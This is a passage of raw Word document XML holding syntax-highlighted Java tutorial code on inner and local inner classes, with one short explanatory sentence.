      <w:r w:rsidRPr="00636B83">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>void</w:t>
      </w:r>
      <w:r w:rsidRPr="00636B83">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> display</w:t>
      </w:r>
      <w:r w:rsidRPr="00636B83">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>()</w:t>
      </w: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05670E0A"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661417"/>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660066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>System</w:t>
      </w:r>
      <w:r w:rsidRPr="00636B83">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00636B83">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>out</w:t>
      </w:r>
      <w:r w:rsidRPr="00636B83">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00636B83">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>println</w:t>
      </w:r>
      <w:r w:rsidRPr="00636B83">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00636B83">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="008800"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>"Accessing outer class variable: "</w:t>
      </w:r>
      <w:r w:rsidRPr="00636B83">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00636B83">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>+</w:t>
      </w:r>
      <w:r w:rsidRPr="00636B83">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> outerVariable</w:t>
      </w:r>
      <w:r w:rsidRPr="00636B83">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D924FA0"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661417"/>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51059D97"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661417"/>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5F7B9C58"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661417"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00636B83">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2429CACA"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661417"/>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000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>public</w:t>
      </w:r>
      <w:r w:rsidRPr="00636B83">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00636B83">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>void</w:t>
      </w:r>
      <w:r w:rsidRPr="00636B83">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> createInnerClass</w:t>
      </w:r>
      <w:r w:rsidRPr="00636B83">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>()</w:t>
      </w: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725573A8"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661417"/>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660066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>InnerClass</w:t>
      </w:r>
      <w:r w:rsidRPr="00636B83">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> inner </w:t>
      </w:r>
      <w:r w:rsidRPr="00636B83">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r w:rsidRPr="00636B83">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00636B83">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>new</w:t>
      </w:r>
      <w:r w:rsidRPr="00636B83">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00636B83">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="660066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>InnerClass</w:t>
      </w:r>
      <w:r w:rsidRPr="00636B83">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>();</w:t>
      </w:r>
      <w:r w:rsidRPr="00636B83">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00636B83">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="880000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>// Inner class can be created inside an outer method</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5342F0C9"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661417"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00636B83">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        inner</w:t>
      </w:r>
      <w:r w:rsidRPr="00636B83">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00636B83">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>display</w:t>
      </w:r>
      <w:r w:rsidRPr="00636B83">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A1C397E"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661417"/>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37D674E2"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661417"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00636B83">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="394EE156"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661417"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00636B83">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="222774EA"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661417"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00636B83">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>public</w:t>
      </w:r>
      <w:r w:rsidRPr="00636B83">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00636B83">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>class</w:t>
      </w:r>
      <w:r w:rsidRPr="00636B83">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00636B83">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="660066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Test</w:t>
      </w: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5EBCF239"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661417"/>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000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>public</w:t>
      </w:r>
      <w:r w:rsidRPr="00636B83">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00636B83">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>static</w:t>
      </w:r>
      <w:r w:rsidRPr="00636B83">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00636B83">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>void</w:t>
      </w:r>
      <w:r w:rsidRPr="00636B83">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> main</w:t>
      </w:r>
      <w:r w:rsidRPr="00636B83">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00636B83">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="660066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>String</w:t>
      </w:r>
      <w:r w:rsidRPr="00636B83">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>[]</w:t>
      </w:r>
      <w:r w:rsidRPr="00636B83">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> args</w:t>
      </w:r>
      <w:r w:rsidRPr="00636B83">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>)</w:t>
      </w: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11A55DE9"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661417"/>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660066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>OuterClass</w:t>
      </w:r>
      <w:r w:rsidRPr="00636B83">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> outer </w:t>
      </w:r>
      <w:r w:rsidRPr="00636B83">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r w:rsidRPr="00636B83">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00636B83">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>new</w:t>
      </w:r>
      <w:r w:rsidRPr="00636B83">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00636B83">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="660066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>OuterClass</w:t>
      </w:r>
      <w:r w:rsidRPr="00636B83">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10106806"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661417"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00636B83">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        outer</w:t>
      </w:r>
      <w:r w:rsidRPr="00636B83">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00636B83">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>createInnerClass</w:t>
      </w:r>
      <w:r w:rsidRPr="00636B83">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60736061"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661417"/>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113039A4" w14:textId="6D6BA5CE"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661417"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00636B83">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
      <w:r w:rsidRPr="00636B83">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6807286F" w14:textId="77777777" w:rsidR="00F23F73" w:rsidRPr="00CE4B95" w:rsidRDefault="00F23F73" w:rsidP="0013258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Local Inner Class</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75A70CC7" w14:textId="77777777" w:rsidR="00F23F73" w:rsidRPr="00CE4B95" w:rsidRDefault="00F23F73" w:rsidP="0013258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local inner class</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is defined within a method or a constructor. It has access to local variables and parameters within that method or constructor.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AC9126C"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38981"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00636B83">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>class</w:t>
      </w:r>
      <w:r w:rsidRPr="00636B83">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00636B83">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="660066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>OuterClass</w:t>
      </w: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0ED4B325"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38981"/>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000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>public</w:t>
      </w:r>
      <w:r w:rsidRPr="00636B83">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00636B83">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>void</w:t>
      </w:r>
      <w:r w:rsidRPr="00636B83">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> display</w:t>
      </w:r>
      <w:r w:rsidRPr="00636B83">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>()</w:t>
      </w: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10E95A4D"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38981"/>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000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>class</w:t>
      </w:r>
      <w:r w:rsidRPr="00636B83">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00636B83">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="660066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>LocalInnerClass</w:t>
      </w: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6339F6DD"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38981"/>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000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>void</w:t>
      </w:r>
      <w:r w:rsidRPr="00636B83">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> show</w:t>
      </w:r>
      <w:r w:rsidRPr="00636B83">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>()</w:t>
      </w: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41C073A5"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38981"/>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660066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>System</w:t>
      </w:r>
      <w:r w:rsidRPr="00636B83">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00636B83">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>out</w:t>
      </w:r>
      <w:r w:rsidRPr="00636B83">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00636B83">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>println</w:t>
      </w:r>
      <w:r w:rsidRPr="00636B83">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00636B83">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="008800"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>"Inside Local Inner Class"</w:t>
      </w:r>
      <w:r w:rsidRPr="00636B83">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F216859"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38981"/>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0FACC4EC"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38981"/>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720B5A1D"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38981"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00636B83">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="388CF635"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38981"/>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660066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>LocalInnerClass</w:t>
      </w:r>
      <w:r w:rsidRPr="00636B83">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> localInner </w:t>
      </w:r>
      <w:r w:rsidRPr="00636B83">
        <w:rPr>
